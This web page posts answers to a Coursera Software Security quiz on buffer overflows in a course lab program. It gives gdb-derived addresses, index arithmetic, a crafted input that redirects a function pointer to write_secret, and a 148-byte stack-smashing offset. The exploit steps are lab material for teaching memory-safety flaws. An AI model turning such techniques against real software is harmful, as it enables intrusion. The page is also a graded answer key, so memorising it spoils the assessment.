All Coursera Quiz Answers

Software Security Week 1 VM BOF Quiz Answer

In this article i am gone to share Coursera Courseย Software Security Week 1 VM BOF Quiz Answer with you..

Software Security Week 1 VM BOF Quiz Answer


Also visit this link:ย  Software Security Week 1 Qualifying Quiz Answer


 

VM BOF Quiz Answer

Question 1) There is a stack-based overflow in the program.

What is the name of the stack-allocated variable that containsย the overflowed buffer?

  • Answer: wis

Question 2) Consider the buffer you just identified:

Running what line of code will overflow the buffer?

  • Answer: 62

Question 3) There is another vulnerability, not dependent at all on the first,ย involving a non-stack allocated buffer that can be indexed outsideย its bounds. What variable contains this buffer?

  • Answer: ptrs

Question 4) Consider the buffer you just identified: Running what line of code overflows the buffer?

  • Answer: 101

Question 5) What is the address of buf?

  • Answer: 0xbfff f130

Question 6) What is the address of ptrs?

  • Answer: 0x0804 a0d4

Question 7) What is the address of write_secret?

  • Answer: 0x0804 8534

Question 8) what is the address of p local to main?

  • Answer: 0xbfff f534

Question 9) What input do you provide so that ptrs[s] reads/executesย the contents of variable p instead of function in ptrs buffer?ย If ok, you will execute pat_on_back function. Enter your answerย as an unsigned integer.

Answer:

  • (p-ptrs)/4 is
  • print /x (0xbffff534 – 0x804a0d4)/4
  • 0x2dfed518 or 771675416

Question 10) What do you enter so that ptrs[s] reads (and then tries to execute)ย starting from the 65th byte in buf, ie. the location at buf[64]?

Enter your answer as an unsiged integer.

Answer:

  • (gdb) print /x &buf[64]
  • $6 = 0xbffff170
  • (gdb) print /dย  (int*)&buf[64]-(int *)&ptrs
  • $14 = 771675175
  • 771675175

Question 11) What do you replace xEExEExEExEE with to call write_secret?

ย Answer:

  • (gdb) print &write_secret
  • $7 = (void (*)(void)) 0x8048534 <write_secret>
  • 771675175x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx34x85x04x08

Question 12) Suppose you wanted to overflow the wis variable to perform a stack smashing attack. You could do this by entering 2 to call put_wisdom, and then enter enough bytes to overwrite the return address of that function, replacing it with the address of write_secret. How many bytes do you need to enter prior to the address of write_secret?

Answer:
  • 148
  • eip at 0xbffff10c
  • (gdb) print &wis
  • $6 = (char (*)[128]) 0xbffff078
  • (gdb) print 0xbffff10c – 0xbffff078
  • $10 = 148